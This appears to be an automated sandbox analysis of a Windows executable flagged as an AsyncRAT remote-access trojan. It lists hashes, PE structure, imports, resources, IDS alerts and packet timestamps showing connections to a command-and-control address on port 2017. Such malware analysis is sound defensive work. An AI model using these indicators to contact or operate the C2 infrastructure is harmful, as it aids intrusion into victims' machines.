                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.502655957593833
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  File name:PCMNil7wkU.exe
                                                                                                  File size:1'743'360 bytes
                                                                                                  MD5:344c9c0f72c535e334a4b605212c69d9
                                                                                                  SHA1:952e1b506659a4113b2eb0857dbb86ee08e043a5
                                                                                                  SHA256:5664820279aa20d408c82998bff07ab34c0986124b09e9ef2025c73686c77f4f
                                                                                                  SHA512:a0e787755a38b2f3de72f17530b8ab6893db498c50a957df17ce16945b661e5daea648b3936267660a35478ac127a125a78c5f53099451e6950488198d204ba5
                                                                                                  SSDEEP:24576:ABOzHk9lBOQdkm5UfwauFL3WlrpY7Gv1eeajEja3KgffHCx2GwVT6ltVIaH3+j:AwyBmm5VXL3WZ7vcVjEvGHaKV2FJ3+j
                                                                                                  TLSH:1C85DF5237E0CDE3D556007ACF0DC7B5E93A7C788A60E09732D8ACDC6B64253265A6E3
                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                  Icon Hash:36728bbb83232b23
                                                                                                  Entrypoint:0x4627d4
                                                                                                  Entrypoint Section:.itext
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:9c466e75a4b8f1ca51d88eec13870235
                                                                                                  Instruction
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  add esp, FFFFFFF0h
                                                                                                  mov eax, 00461050h
                                                                                                  call 00007FF4B9436FC9h
                                                                                                  mov eax, dword ptr [0058B6F4h]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  call 00007FF4B948B959h
                                                                                                  mov ecx, dword ptr [0058B7ECh]
                                                                                                  mov eax, dword ptr [0058B6F4h]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  mov edx, dword ptr [00460BB0h]
                                                                                                  call 00007FF4B948B959h
                                                                                                  mov eax, dword ptr [0058B6F4h]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  call 00007FF4B948B9CDh
                                                                                                  call 00007FF4B9434E58h
                                                                                                  lea eax, dword ptr [eax+00h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1900000x2620.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x19c0000x16400.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1950000x6f30.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1940000x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1907400x5ec.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x602800x6040085e21d4074c293c5dda21dc648954a60False0.5166725852272728data6.527037353978384IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .itext0x620000x81c0xa0024ea8c4a5fbc176b49f3f7bdd10211d4False0.51953125data5.4868067764310435IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .data0x630000x12888c0x128a00c427229c8ea1558b3060d139c84b2273False0.7086806652970923data7.505375791125263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .bss0x18c0000x36580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .idata0x1900000x26200x2800645bd3caccdaf1e8a8046087eaaf5818False0.310546875Encore not stripped - version 255.0381359206642236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .tls0x1930000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rdata0x1940000x180x200997bd445bd2a40316c4d07754f0fbc20False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Y"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x1950000x6f300x7000ec80e6ffb76a64ef1ce99769581817ceFalse0.6201171875data6.672584848554824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x19c0000x164000x16400ec88f869a8cf072294337de40d8353d0False0.16622410463483145data5.711041862104467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_CURSOR0x19ca8c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                  RT_CURSOR0x19cbc00x134dataEnglishUnited States0.4642857142857143
                                                                                                  RT_CURSOR0x19ccf40x134dataEnglishUnited States0.4805194805194805
                                                                                                  RT_CURSOR0x19ce280x134dataEnglishUnited States0.38311688311688313
                                                                                                  RT_CURSOR0x19cf5c0x134dataEnglishUnited States0.36038961038961037
                                                                                                  RT_CURSOR0x19d0900x134dataEnglishUnited States0.4090909090909091
                                                                                                  RT_CURSOR0x19d1c40x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                  RT_BITMAP0x19d2f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                  RT_BITMAP0x19d4c80x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                  RT_BITMAP0x19d6ac0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                  RT_BITMAP0x19d87c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                  RT_BITMAP0x19da4c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                  RT_BITMAP0x19dc1c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                  RT_BITMAP0x19ddec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                  RT_BITMAP0x19dfbc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                  RT_BITMAP0x19e18c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                  RT_BITMAP0x19e35c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                  RT_ICON0x19e52c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m0.4131147540983607
                                                                                                  RT_ICON0x19eeb40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.29924953095684803
                                                                                                  RT_ICON0x19ff5c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.10951940850277264
                                                                                                  RT_ICON0x1a53e40x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.07704435568635695
                                                                                                  RT_STRING0x1ae88c0x3dcdata0.4200404858299595
                                                                                                  RT_STRING0x1aec680xb4data0.6888888888888889
                                                                                                  RT_STRING0x1aed1c0xe8data0.6422413793103449
                                                                                                  RT_STRING0x1aee040x2a8data0.4764705882352941
                                                                                                  RT_STRING0x1af0ac0x3e8data0.382
                                                                                                  RT_STRING0x1af4940x370data0.4022727272727273
                                                                                                  RT_STRING0x1af8040x3ccdata0.33539094650205764
                                                                                                  RT_STRING0x1afbd00x214data0.49624060150375937
                                                                                                  RT_STRING0x1afde40xccdata0.6274509803921569
                                                                                                  RT_STRING0x1afeb00x194data0.5643564356435643
                                                                                                  RT_STRING0x1b00440x3c4data0.3288381742738589
                                                                                                  RT_STRING0x1b04080x338data0.42961165048543687
                                                                                                  RT_STRING0x1b07400x294data0.42424242424242425
                                                                                                  RT_RCDATA0x1b09d40x10data1.5
                                                                                                  RT_RCDATA0x1b09e40x2c4data0.7259887005649718
                                                                                                  RT_RCDATA0x1b0ca80x745Delphi compiled form 'TComSetupFrm'0.3750671681891456
                                                                                                  RT_RCDATA0x1b13f00x840Delphi compiled form 'TComTrmSetForm'0.4090909090909091
                                                                                                  RT_RCDATA0x1b1c300x633Delphi compiled form 'TForm1'0.44045368620037806
                                                                                                  RT_GROUP_CURSOR0x1b22640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                  RT_GROUP_CURSOR0x1b22780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                  RT_GROUP_CURSOR0x1b228c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x1b22a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x1b22b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x1b22c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x1b22dc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_ICON0x1b22f00x3edata0.8709677419354839
                                                                                                  DLLImport
                                                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                  user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                  kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                  user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                  gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                  version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                  kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                  oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                  ole32.dllCoUninitialize, CoInitialize
                                                                                                  kernel32.dllSleep
                                                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                  comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                  uRLFileProtocolHandlerA
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States
                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  139.84.229.159192.168.2.52017497072030673 01/23/24-14:33:00.107795TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)201749707139.84.229.159192.168.2.5
                                                                                                  139.84.229.159192.168.2.52017497072035595 01/23/24-14:33:00.107795TCP2035595ET TROJAN Generic AsyncRAT Style SSL Cert201749707139.84.229.159192.168.2.5
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 23, 2024 14:32:50.530705929 CET49704443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.530797958 CET44349704150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:50.530895948 CET49704443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.531054020 CET49704443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.531352997 CET44349704150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:50.531421900 CET49704443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.576374054 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.576412916 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:50.576478958 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.577924013 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.577941895 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:50.962935925 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:50.963011026 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.965384960 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:50.965394020 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:50.965814114 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:51.008174896 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:51.057610035 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:51.097904921 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:51.384867907 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:51.385092020 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:51.385154963 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:51.387270927 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:51.387290955 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:51.387334108 CET49705443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:32:51.387341022 CET44349705150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:32:59.375097990 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:32:59.726002932 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:32:59.726586103 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:32:59.745872021 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:00.107795000 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:00.107825041 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:00.107928038 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:00.113692999 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:00.465652943 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:00.515456915 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:01.297205925 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:01.700170040 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:01.700356960 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:02.106523037 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:06.728553057 CET49709443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:06.728601933 CET44349709150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:06.728672981 CET49709443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:06.728863001 CET49709443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:06.729254007 CET44349709150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:06.729324102 CET49709443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:06.748394966 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:06.748449087 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:06.748531103 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:06.750405073 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:06.750423908 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.132833004 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.132910967 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:07.134718895 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:07.134732962 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.135057926 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.185904980 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:07.207705975 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:07.249912024 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.646083117 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.646289110 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.646353960 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:07.646532059 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:07.646547079 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:07.646576881 CET49710443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:07.646581888 CET44349710150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:12.231736898 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:12.276654959 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:12.627803087 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:12.682993889 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:15.108474970 CET49717443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.108513117 CET44349717150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.108607054 CET49717443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.109458923 CET49717443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.109536886 CET44349717150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.109599113 CET49717443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.202770948 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.202857971 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.202976942 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.205048084 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.205121040 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.229108095 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:15.568536043 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.568614006 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.571968079 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.571979046 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.572788954 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.614948034 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.623363018 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.623451948 CET497072017192.168.2.5139.84.229.159
